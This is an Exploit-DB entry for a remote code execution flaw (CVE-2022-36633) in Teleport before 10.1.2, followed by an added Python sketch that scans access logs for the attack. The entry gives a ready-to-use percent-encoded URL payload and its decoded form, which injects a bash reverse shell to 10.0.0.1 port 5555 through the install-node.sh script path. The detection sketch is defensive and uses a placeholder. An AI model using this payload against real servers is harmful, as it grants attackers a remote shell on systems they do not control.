[remote] Teleport v10.1.1 - Remote Code Execution (RCE)
source link: https://www.exploit-db.com/exploits/51019
Exploit:
# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
# Date: 08/01/2022
# Exploit Author: Brandon Roach & Brian Landrum
# Vendor Homepage: https://goteleport.com
# Software Link: https://github.com/gravitational/teleport
# Version: < 10.1.2
# Tested on: Linux
# CVE: CVE-2022-36633
Proof of Concept (payload):
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%30%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?method=iam
Decoded payload:
"
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #
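
Detection sketch, added here as an example and not part of the original exploit entry: it percent-decodes request targets from web access logs and flags any `/scripts/<segment>/install-node.sh` request whose segment is not a plain token, which is the shape of the PoC above. The combined log format, the `SAFE_SEGMENT` allow-list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Path shape taken from the PoC: /scripts/<segment>/install-node.sh
SCRIPT_PATH = re.compile(r"/scripts/(?P<segment>.*)/install-node\.sh", re.DOTALL)
# Assumption: a legitimate segment is a plain token with no quote, whitespace,
# newline, slash or other shell-significant byte. Adjust to your token format.
SAFE_SEGMENT = re.compile(r"[A-Za-z0-9._-]{1,128}")
# Request line inside a combined-format access log entry (assumed format).
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[0-9.]+"')

# Constructed sample log lines; the payload is replaced by a placeholder.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2022:10:00:00 +0000] '
    '"GET /scripts/0123456789abcdef/install-node.sh?method=iam HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Aug/2022:10:00:05 +0000] '
    '"GET /scripts/%22%0aPLACEHOLDER%20%2fx%20%23/install-node.sh?method=iam HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Aug/2022:10:00:09 +0000] "GET /web/login HTTP/1.1" 200 900',
]

def suspicious_segment(target):
    """Return the decoded path segment if it is not a plain token, else None."""
    path = unquote(target.split("?", 1)[0])   # drop the query, then percent-decode
    match = SCRIPT_PATH.fullmatch(path)
    if match is None:
        return None                           # not an install-script request
    segment = match.group("segment")
    # fullmatch, so a trailing newline cannot slip past the allow-list
    return None if SAFE_SEGMENT.fullmatch(segment) else segment

def scan(lines):
    """Yield (line_number, decoded_segment) for each flagged log line."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        if match is None:
            continue
        segment = suspicious_segment(match.group("target"))
        if segment is not None:
            yield number, segment

if __name__ == "__main__":
    for number, segment in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious install-script segment {segment!r}")
```

Matching on the decoded path rather than on a fixed encoded string catches the same request however its bytes are percent-encoded.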